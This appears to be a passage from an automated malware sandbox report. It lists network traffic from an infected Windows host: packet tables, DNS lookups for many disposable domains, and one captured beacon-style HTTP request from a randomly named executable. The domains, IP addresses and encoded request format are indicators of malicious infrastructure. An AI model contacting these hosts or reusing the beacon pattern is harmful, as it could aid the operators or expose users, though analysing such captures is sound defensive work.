Jan 10, 2025 19:53:02.114543915 CET	80	49946	199.59.243.228	192.168.2.11
Jan 10, 2025 19:53:02.114667892 CET	49946	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:53:02.114732027 CET	80	49946	199.59.243.228	192.168.2.11
Jan 10, 2025 19:53:02.114784002 CET	49946	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:53:02.117985964 CET	49946	80	192.168.2.11	199.59.243.228
Jan 10, 2025 19:53:02.122832060 CET	80	49946	199.59.243.228	192.168.2.11
Jan 10, 2025 19:53:07.239873886 CET	49972	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:07.244904041 CET	80	49972	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:07.245017052 CET	49972	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:07.336925030 CET	49972	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:07.341859102 CET	80	49972	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:07.901907921 CET	80	49972	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:07.901952028 CET	80	49972	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:07.902034998 CET	49972	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:08.852881908 CET	49972	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:09.871902943 CET	49984	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:09.876847982 CET	80	49984	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:09.876934052 CET	49984	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:09.893435955 CET	49984	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:09.898247004 CET	80	49984	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:11.400053024 CET	49984	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:11.559299946 CET	80	49984	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:11.559336901 CET	80	49984	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:11.559348106 CET	80	49984	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:11.559361935 CET	80	49984	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:11.559442997 CET	49984	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:11.559442997 CET	49984	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:11.559492111 CET	49984	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:11.559492111 CET	49984	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:11.559539080 CET	80	49984	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:11.559587955 CET	49984	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:11.561007977 CET	80	49984	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:11.561059952 CET	49984	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:12.418612003 CET	49985	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:12.423602104 CET	80	49985	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:12.423703909 CET	49985	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:12.439162016 CET	49985	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:12.444029093 CET	80	49985	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:12.444143057 CET	80	49985	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:13.078444004 CET	80	49985	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:13.078495979 CET	80	49985	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:13.078571081 CET	49985	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:13.946640015 CET	49985	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:15.116996050 CET	49986	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:15.122112989 CET	80	49986	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:15.122189999 CET	49986	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:15.198091984 CET	49986	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:15.203277111 CET	80	49986	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:15.750020981 CET	80	49986	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:15.750118017 CET	80	49986	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:15.750180006 CET	49986	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:15.782432079 CET	49986	80	192.168.2.11	46.38.243.234
Jan 10, 2025 19:53:15.787369967 CET	80	49986	46.38.243.234	192.168.2.11
Jan 10, 2025 19:53:21.045336962 CET	49987	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:21.050273895 CET	80	49987	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:21.050432920 CET	49987	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:21.066210985 CET	49987	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:21.071070910 CET	80	49987	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:21.749763012 CET	80	49987	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:21.749787092 CET	80	49987	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:21.749900103 CET	49987	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:22.571671963 CET	49987	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:23.590496063 CET	49988	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:23.596606016 CET	80	49988	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:23.596695900 CET	49988	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:23.612287045 CET	49988	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:23.617357969 CET	80	49988	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:24.277594090 CET	80	49988	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:24.277654886 CET	80	49988	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:24.277708054 CET	49988	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:25.118837118 CET	49988	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:26.137922049 CET	49989	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:26.143119097 CET	80	49989	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:26.143225908 CET	49989	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:26.395029068 CET	49989	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:26.400011063 CET	80	49989	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:26.400048971 CET	80	49989	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:27.117566109 CET	80	49989	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:27.117587090 CET	80	49989	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:27.117650032 CET	49989	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:27.899939060 CET	49989	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:28.918894053 CET	49990	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:28.923767090 CET	80	49990	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:28.923872948 CET	49990	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:28.933474064 CET	49990	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:28.938328028 CET	80	49990	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:29.773893118 CET	80	49990	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:29.773967981 CET	80	49990	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:29.774195910 CET	49990	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:29.776927948 CET	49990	80	192.168.2.11	176.57.65.76
Jan 10, 2025 19:53:29.781800985 CET	80	49990	176.57.65.76	192.168.2.11
Jan 10, 2025 19:53:47.934437037 CET	49991	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:47.939256907 CET	80	49991	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:47.939343929 CET	49991	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:47.957094908 CET	49991	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:47.961988926 CET	80	49991	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:48.544353962 CET	80	49991	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:48.544401884 CET	80	49991	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:48.544480085 CET	49991	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:49.462435961 CET	49991	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:50.482105970 CET	49992	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:50.487174988 CET	80	49992	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:50.487270117 CET	49992	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:50.504903078 CET	49992	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:50.509774923 CET	80	49992	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:51.111155033 CET	80	49992	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:51.111344099 CET	80	49992	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:51.111413002 CET	49992	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:52.009169102 CET	49992	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:53.028171062 CET	49993	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:53.033472061 CET	80	49993	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:53.033579111 CET	49993	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:53.049382925 CET	49993	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:53.054285049 CET	80	49993	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:53.054387093 CET	80	49993	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:53.620654106 CET	80	49993	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:53.620742083 CET	80	49993	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:53.620814085 CET	49993	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:54.607948065 CET	49993	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:55.662018061 CET	49994	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:55.667052984 CET	80	49994	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:55.667159081 CET	49994	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:55.683648109 CET	49994	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:55.688575029 CET	80	49994	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:57.032109976 CET	80	49994	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:57.032138109 CET	80	49994	209.74.79.42	192.168.2.11
Jan 10, 2025 19:53:57.032430887 CET	49994	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:57.034877062 CET	49994	80	192.168.2.11	209.74.79.42
Jan 10, 2025 19:53:57.040318966 CET	80	49994	209.74.79.42	192.168.2.11
Jan 10, 2025 19:54:02.734664917 CET	49995	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:02.739614964 CET	80	49995	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:02.739685059 CET	49995	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:02.834877968 CET	49995	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:02.840089083 CET	80	49995	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:03.930929899 CET	80	49995	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:03.931129932 CET	80	49995	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:03.931185007 CET	49995	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:04.337697029 CET	49995	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:05.360791922 CET	49996	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:05.365789890 CET	80	49996	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:05.365951061 CET	49996	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:05.396258116 CET	49996	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:05.401117086 CET	80	49996	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:05.948124886 CET	80	49996	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:05.948191881 CET	80	49996	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:05.948297977 CET	49996	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:06.899880886 CET	49996	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:07.920917034 CET	49997	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:07.926048994 CET	80	49997	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:07.926294088 CET	49997	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:07.947902918 CET	49997	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:07.960388899 CET	80	49997	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:07.960402966 CET	80	49997	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:08.533895969 CET	80	49997	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:08.533941984 CET	80	49997	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:08.534074068 CET	49997	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:09.462461948 CET	49997	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:10.481017113 CET	49998	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:10.486284971 CET	80	49998	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:10.486406088 CET	49998	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:10.495913982 CET	49998	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:10.500797033 CET	80	49998	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:11.097788095 CET	80	49998	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:11.097830057 CET	80	49998	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:11.098052979 CET	49998	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:11.105988026 CET	49998	80	192.168.2.11	198.2.214.227
Jan 10, 2025 19:54:11.111110926 CET	80	49998	198.2.214.227	192.168.2.11
Jan 10, 2025 19:54:25.282074928 CET	52780	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:54:25.286897898 CET	53	52780	1.1.1.1	192.168.2.11
Jan 10, 2025 19:54:25.286967039 CET	52780	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:54:25.286989927 CET	52780	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:54:25.291847944 CET	53	52780	1.1.1.1	192.168.2.11
Jan 10, 2025 19:54:26.969043016 CET	53	52780	1.1.1.1	192.168.2.11
Jan 10, 2025 19:54:26.969445944 CET	52780	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:54:26.974518061 CET	53	52780	1.1.1.1	192.168.2.11
Jan 10, 2025 19:54:26.974589109 CET	52780	53	192.168.2.11	1.1.1.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 19:51:59.084824085 CET	57601	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:51:59.163311005 CET	53	57601	1.1.1.1	192.168.2.11
Jan 10, 2025 19:52:06.216543913 CET	63913	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:52:07.227904081 CET	63913	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:52:07.393976927 CET	53	63913	1.1.1.1	192.168.2.11
Jan 10, 2025 19:52:07.393992901 CET	53	63913	1.1.1.1	192.168.2.11
Jan 10, 2025 19:52:23.372416019 CET	55473	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:52:24.016797066 CET	53	55473	1.1.1.1	192.168.2.11
Jan 10, 2025 19:52:32.075166941 CET	50669	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:52:32.084398985 CET	53	50669	1.1.1.1	192.168.2.11
Jan 10, 2025 19:52:40.287647963 CET	53773	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:52:40.342603922 CET	53	53773	1.1.1.1	192.168.2.11
Jan 10, 2025 19:52:53.841098070 CET	59442	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:52:54.011885881 CET	53	59442	1.1.1.1	192.168.2.11
Jan 10, 2025 19:53:07.156404972 CET	51700	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:53:07.216944933 CET	53	51700	1.1.1.1	192.168.2.11
Jan 10, 2025 19:53:20.801321983 CET	65262	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:53:21.042737961 CET	53	65262	1.1.1.1	192.168.2.11
Jan 10, 2025 19:53:34.795384884 CET	59394	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:53:35.790625095 CET	59394	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:53:36.790604115 CET	59394	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:53:36.960345984 CET	53	59394	1.1.1.1	192.168.2.11
Jan 10, 2025 19:53:36.960364103 CET	53	59394	1.1.1.1	192.168.2.11
Jan 10, 2025 19:53:36.960372925 CET	53	59394	1.1.1.1	192.168.2.11
Jan 10, 2025 19:53:39.995495081 CET	59197	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:53:40.993801117 CET	59197	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:53:42.009975910 CET	59197	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:53:42.907891989 CET	53	59197	1.1.1.1	192.168.2.11
Jan 10, 2025 19:53:42.907910109 CET	53	59197	1.1.1.1	192.168.2.11
Jan 10, 2025 19:53:42.907918930 CET	53	59197	1.1.1.1	192.168.2.11
Jan 10, 2025 19:53:47.920232058 CET	49496	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:53:47.931997061 CET	53	49496	1.1.1.1	192.168.2.11
Jan 10, 2025 19:54:02.044691086 CET	62363	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:54:02.729286909 CET	53	62363	1.1.1.1	192.168.2.11
Jan 10, 2025 19:54:16.122383118 CET	64782	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:54:16.209964991 CET	53	64782	1.1.1.1	192.168.2.11
Jan 10, 2025 19:54:24.279673100 CET	60182	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:54:25.274904013 CET	60182	53	192.168.2.11	1.1.1.1
Jan 10, 2025 19:54:25.281672001 CET	53	60182	1.1.1.1	192.168.2.11
Jan 10, 2025 19:54:25.862793922 CET	53	60182	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 19:51:59.084824085 CET	192.168.2.11	1.1.1.1	0xd09c	Standard query (0)	www.potorooqr.lol	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:06.216543913 CET	192.168.2.11	1.1.1.1	0x2cfb	Standard query (0)	www.dffmdogmyftftv2e.cyou	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:07.227904081 CET	192.168.2.11	1.1.1.1	0x2cfb	Standard query (0)	www.dffmdogmyftftv2e.cyou	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:23.372416019 CET	192.168.2.11	1.1.1.1	0xadf1	Standard query (0)	www.vipstargold.buzz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:32.075166941 CET	192.168.2.11	1.1.1.1	0xc2c7	Standard query (0)	www.hwak.live	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:40.287647963 CET	192.168.2.11	1.1.1.1	0x3802	Standard query (0)	www.gern.dev	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:53.841098070 CET	192.168.2.11	1.1.1.1	0xbf35	Standard query (0)	www.sql.dance	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:07.156404972 CET	192.168.2.11	1.1.1.1	0xaa7a	Standard query (0)	www.lmueller.dev	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:20.801321983 CET	192.168.2.11	1.1.1.1	0xd30c	Standard query (0)	www.newbh.pro	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:34.795384884 CET	192.168.2.11	1.1.1.1	0x68b1	Standard query (0)	www.omp037621r.vip	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:35.790625095 CET	192.168.2.11	1.1.1.1	0x68b1	Standard query (0)	www.omp037621r.vip	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:36.790604115 CET	192.168.2.11	1.1.1.1	0x68b1	Standard query (0)	www.omp037621r.vip	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:39.995495081 CET	192.168.2.11	1.1.1.1	0x4f0c	Standard query (0)	www.omp037621r.vip	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:40.993801117 CET	192.168.2.11	1.1.1.1	0x4f0c	Standard query (0)	www.omp037621r.vip	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:42.009975910 CET	192.168.2.11	1.1.1.1	0x4f0c	Standard query (0)	www.omp037621r.vip	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:47.920232058 CET	192.168.2.11	1.1.1.1	0xb874	Standard query (0)	www.valuault.store	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:54:02.044691086 CET	192.168.2.11	1.1.1.1	0x3f4d	Standard query (0)	www.qqssii.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:54:16.122383118 CET	192.168.2.11	1.1.1.1	0x4ad0	Standard query (0)	www.arabhost.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:54:24.279673100 CET	192.168.2.11	1.1.1.1	0x172	Standard query (0)	www.dodowo.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:54:25.274904013 CET	192.168.2.11	1.1.1.1	0x172	Standard query (0)	www.dodowo.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:54:25.286989927 CET	192.168.2.11	1.1.1.1	0x1	Standard query (0)	www.dodowo.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 19:51:59.163311005 CET	1.1.1.1	192.168.2.11	0xd09c	No error (0)	www.potorooqr.lol		127.0.0.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:07.393976927 CET	1.1.1.1	192.168.2.11	0x2cfb	No error (0)	www.dffmdogmyftftv2e.cyou	an05-prod-x.cdn-ng.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:52:07.393976927 CET	1.1.1.1	192.168.2.11	0x2cfb	No error (0)	an05-prod-x.cdn-ng.net		103.117.135.13	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:07.393976927 CET	1.1.1.1	192.168.2.11	0x2cfb	No error (0)	an05-prod-x.cdn-ng.net		43.251.56.161	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:07.393992901 CET	1.1.1.1	192.168.2.11	0x2cfb	No error (0)	www.dffmdogmyftftv2e.cyou	an05-prod-x.cdn-ng.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:52:07.393992901 CET	1.1.1.1	192.168.2.11	0x2cfb	No error (0)	an05-prod-x.cdn-ng.net		103.117.135.13	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:07.393992901 CET	1.1.1.1	192.168.2.11	0x2cfb	No error (0)	an05-prod-x.cdn-ng.net		43.251.56.161	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:24.016797066 CET	1.1.1.1	192.168.2.11	0xadf1	Server failure (2)	www.vipstargold.buzz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:32.084398985 CET	1.1.1.1	192.168.2.11	0xc2c7	Name error (3)	www.hwak.live	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:40.342603922 CET	1.1.1.1	192.168.2.11	0x3802	No error (0)	www.gern.dev		185.151.30.223	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:52:54.011885881 CET	1.1.1.1	192.168.2.11	0xbf35	No error (0)	www.sql.dance		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:07.216944933 CET	1.1.1.1	192.168.2.11	0xaa7a	No error (0)	www.lmueller.dev		46.38.243.234	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:21.042737961 CET	1.1.1.1	192.168.2.11	0xd30c	No error (0)	www.newbh.pro		176.57.65.76	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:36.960345984 CET	1.1.1.1	192.168.2.11	0x68b1	Name error (3)	www.omp037621r.vip	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:36.960364103 CET	1.1.1.1	192.168.2.11	0x68b1	Name error (3)	www.omp037621r.vip	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:36.960372925 CET	1.1.1.1	192.168.2.11	0x68b1	Name error (3)	www.omp037621r.vip	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:42.907891989 CET	1.1.1.1	192.168.2.11	0x4f0c	Name error (3)	www.omp037621r.vip	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:42.907910109 CET	1.1.1.1	192.168.2.11	0x4f0c	Name error (3)	www.omp037621r.vip	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:42.907918930 CET	1.1.1.1	192.168.2.11	0x4f0c	Name error (3)	www.omp037621r.vip	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:53:47.931997061 CET	1.1.1.1	192.168.2.11	0xb874	No error (0)	www.valuault.store		209.74.79.42	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:54:02.729286909 CET	1.1.1.1	192.168.2.11	0x3f4d	No error (0)	www.qqssii.top		198.2.214.227	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:54:16.209964991 CET	1.1.1.1	192.168.2.11	0x4ad0	Name error (3)	www.arabhost.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:54:25.862793922 CET	1.1.1.1	192.168.2.11	0x172	No error (0)	www.dodowo.shop	dodowo.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:54:25.862793922 CET	1.1.1.1	192.168.2.11	0x172	No error (0)	dodowo.shop		112.175.247.179	A (IP address)	IN (0x0001)	false
Jan 10, 2025 19:54:26.969043016 CET	1.1.1.1	192.168.2.11	0x1	No error (0)	www.dodowo.shop	dodowo.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 19:54:26.969043016 CET	1.1.1.1	192.168.2.11	0x1	No error (0)	dodowo.shop		112.175.247.179	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.dffmdogmyftftv2e.cyou

www.gern.dev

www.sql.dance

www.lmueller.dev

www.newbh.pro

www.valuault.store

www.qqssii.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49707	103.117.135.13	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:52:07.426215887 CET	483	OUT	GET /oo53/?ERYLmh=w7zSaK21vx4u10sWVMnfmIW6aSu6YucXytn5RpNm+gMsUo2HNotrI4MxDLqt2VVD72DPDfflNvbSi1F9wjFvsc9CjUP+BpgRjgEeDTY+44qn6Defd5ku6J4=&X6H8=IvQt7 HTTP/1.1 Host: www.dffmdogmyftftv2e.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Jan 10, 2025 19:52:08.318289995 CET	1062	IN	HTTP/1.1 400 Bad Request Server: nginx/1.20.1 Date: Fri, 10 Jan 2025 18:52:08 GMT Content-Type: text/html; charset=utf-8 X-Cache: MISS from sg1-cdnb135-013 Content-Length: 859 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 30 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 27 6d 61 69 6e 27 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 27 3e 0a 3c 69 3e 3c 68 32 3e 53 6f 6d 65 74 68 69 6e 67 20 65 72 72 6f 72 3a 3c 2f 68 32 3e 3c 2f 69 3e 0a 3c 70 3e 3c 68 33 3e 34 30 30 3c 2f 68 33 3e 3c 68 33 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 27 72 65 64 27 3e 68 6f 73 74 20 6e 6f 74 